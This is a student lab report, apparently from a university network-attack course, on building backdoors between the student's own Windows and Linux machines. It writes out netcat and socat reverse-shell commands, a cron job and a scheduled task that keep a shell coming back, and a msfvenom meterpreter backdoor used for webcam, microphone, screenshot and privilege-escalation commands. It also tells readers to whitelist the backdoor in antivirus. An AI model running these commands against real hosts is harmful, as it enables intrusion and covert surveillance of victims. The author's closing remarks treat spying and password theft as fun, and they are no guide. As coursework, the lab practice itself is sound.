20155305《网络对抗》后门原理与实践

20155305《网络对抗》后门原理与实践

实验过程(基本后门工具实践)

1、Win获取Linux shell

(1)Win在cmd.exe中使用ipconfig命令查看主机的IP。

1071527-20180327133710661-322430043.png

(2)Win下载老师的下载地址比较方便、解压ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe -l -p 5305命令运行ncat.exe监听5305端口。

1071527-20180327134237145-782526920.png

(3)Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去连接Win的5305端口。

1071527-20180327134514628-1552506171.png

连接成功后就可以在Win的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell。

1071527-20180327134319733-280151626.png

2、Linux获取Win shell

(1)Linux在终端中使用ifconfig命令查看自己的IP。

1071527-20180327135036029-615394771.jpg

(2)Linux使用nc -l -p 5305命令监听5305端口。

(3)Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的5305端口。

1071527-20180327135744093-2115049729.png

(4)连接成功后就可以在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。

1071527-20180327135954264-757056004.png

3、使用nc传输数据

(1)Win使用ncat.exe -l 5305命令监听5305端口。
(2)Linux在终端窗口使用nc Win的IP 端口号命令去连接Win的5305端口。

(3)双向传输数据。

1071527-20180327140552690-801635260.png

1071527-20180327140604623-2043153423.png

4、nc定时启动

(1)Win使用ncat.exe -l -p 5305命令运行ncat.exe监听5305端口。

(2)Linux使用crontab -e命令,在最后一行添加分钟数 * * * * /bin/netcat Win的IP 端口 -e /bin/sh,在每个小时的这个分钟反向连接Windows主机的端口。

1071527-20180327141444700-1759417214.png

1071527-20180327142018806-381112564.png

(3)15分时Win获得了Linux的shell,可以显示想要获取的东西

1071527-20180327141929228-2128026838.png

5、实践SoCat的功能

(1)在Win下,依次打开控制面板,管理工具,任务计划程序,然后选择创建一个新任务,填写好任务名称(eg20155305);新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口号 exec:cmd.exe,pty,stderr

1071527-20180327142500468-613402081.png

1071527-20180327142508206-440247980.jpg

此时需下载socat.exe老师的下载地址比较方便
1071527-20180327142514264-959522789.jpg

(2)刷新查看到新建的任务已经开始运行了若未运行可以右键点击所创建任务并开始运行

1071527-20180327142649314-1848560142.png

(3)Linux下使用socat - tcp:Win的IP:端口命令,此时已经获取了Win的shell,可以查看想知道的东西。

1071527-20180327142845415-761035533.jpg

6、实践MSF Meterpreter功能

(1)Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20155305_backdoor.exe(20155305_backdoor.exe是会生成的后门文件的名字)命令生成后门。

1071527-20180327143902444-1808016843.png

(2)将后门传送到Win主机上(我传送到了ncat文件夹下)。遇到杀毒软件要精确将你自己的后门恢复添加信任区(适合用于腾讯电脑管家)

1071527-20180327144916176-769470125.png

1071527-20180327144925063-617073977.png

1071527-20180327144932520-712276185.png

(3)Linux使用msfconsole命令进入控制台,并进行一系列payload、IP、端口的设置。

1071527-20180327145407712-1744329732.png

(4)在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口

1071527-20180327150515045-1972359890.png

(5)Linux使用exploit命令开始监听,此时在Win上执行后门程序。

1071527-20180327151229343-1190819052.png

1071527-20180327151252484-1726129040.png

1071527-20180327151301286-892814388.png

(6)Linux已经和Win连接好了,可以开始尝试不同的功能了。

  • 录音功能:record_mic

1071527-20180327151543541-441600286.png

  • 拍照功能:webcam_snap

1071527-20180327151825152-1377259162.png

1071527-20180327155654284-460262529.png

  • 拍摄视频功能:webcam_stream

1071527-20180327152306027-1794298512.png

  • 记录击键功能:screenshot

1071527-20180327152924885-935690601.png

  • 提权:getuid以及getsystem

1071527-20180327153127016-413684040.png

实验总结与体会

本次实验让我对这门课程惊为天人哈哈,完全实现小时候所以为的黑客们会做的事情:监控偷看他人,翻看他人电脑里的资料、盗取别人的密码、控制别人的电脑等很酷炫很爽很惊悚。感觉自己学会了一项看似很了不起的技能,感觉拿出去可以和无知的高中小伙伴吹个牛了哈哈,享受一下别人崇拜。所以现在没学免杀,以后学了免杀岂不是更厉害,电脑可以发现我的后门是个病毒我也是很开心哈哈,也就是说我的电脑管家也是有用的嘛哈哈,免杀了就不晓得了。这次收获很大,感谢老师感谢这门课程。

转载于:https://www.cnblogs.com/20155305ql/p/8657005.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值